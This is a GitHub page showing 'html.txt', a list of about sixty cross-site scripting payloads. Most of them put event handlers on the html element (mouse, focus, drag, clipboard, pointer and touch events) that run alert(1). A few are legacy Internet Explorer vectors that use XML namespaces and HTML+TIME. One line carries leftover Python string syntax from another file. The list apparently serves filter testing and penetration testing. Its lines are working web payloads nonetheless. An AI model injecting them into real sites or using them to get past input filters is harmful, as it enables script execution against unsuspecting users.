-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathhtml.txt
60 lines (59 loc) · 3.61 KB
/
html.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
<html draggable="true" ondrag="alert(1)">test</html>
<html draggable="true" ondragend="alert(1)">test</html>
<html draggable="true" ondragenter="alert(1)">test</html>
<html draggable="true" ondragleave="alert(1)">test</html>
<html draggable="true" ondragstart="alert(1)">test</html>
<html id=x tabindex=1 onactivate=alert(1)></html>
<html id=x tabindex=1 onbeforeactivate=alert(1)></html>
<html id=x tabindex=1 onbeforedeactivate=alert(1)></html><input autofocus>
<html id=x tabindex=1 ondeactivate=alert(1)></html><input id=y autofocus>
<html id=x tabindex=1 onfocus=alert(1)></html>
<html id=x tabindex=1 onfocusin=alert(1)></html>
<html onafterscriptexecute=alert(1)><script>1</script>
<html onbeforecopy="alert(1)" contenteditable>test</html>
<html onbeforecut="alert(1)" contenteditable>test</html>
<html onbeforepaste="alert(1)" contenteditable>test</html>
<html onbeforescriptexecute=alert(1)><script>1</script>
<html onblur=alert(1) tabindex=1 id=x></html><input autofocus>
<html onclick="alert(1)">test</html>
<html oncontextmenu="alert(1)">test</html>
<html oncopy=alert(1) value="XSS" autofocus tabindex=1>test
<html oncut=alert(1) value="XSS" autofocus tabindex=1>test
<html ondblclick="alert(1)" autofocus tabindex=1>test</html>
<html onfocusout=alert(1) tabindex=1 id=x></html><input autofocus>
<html onkeydown="alert(1)" contenteditable>test</html>
<html onkeypress="alert(1)" contenteditable>test</html>
<html onkeyup="alert(1)" contenteditable>test</html>
<html onmousedown="alert(1)">test</html>
<html onmouseenter="alert(1)">test</html>
<html onmouseleave="alert(1)">test</html>
<html onmousemove="alert(1)">test</html>
<html onmouseout="alert(1)">test</html>
<html onmouseover="alert(1)">test</html>
<html onmouseup="alert(1)">test</html>
<html onmousewheel=alert(1)>requires scrolling
<html onpaste="alert(1)" contenteditable>test</html>
<html onpointerdown=alert(1)>XSS</html>
<html onpointerenter=alert(1)>XSS</html>
<html onpointerleave=alert(1)>XSS</html>
<html onpointermove=alert(1)>XSS</html>
<html onpointerout=alert(1)>XSS</html>
<html onpointerover=alert(1)>XSS</html>
<html onpointerrawupdate=alert(1)>XSS</html>
<html onpointerup=alert(1)>XSS</html>
<html ontouchstart=alert(1)>
<html ontouchend=alert(1)>
<html ontouchmove=alert(1)>
<html ontouchcancel=alert(1)>
<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp>
<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave>
<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel>
<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver>
<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter>
<html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown>
<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut>
<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove>
<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover>
<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove>
<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:javascript:alert(1)"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert(1)</SCRIPT>"></BODY></HTML>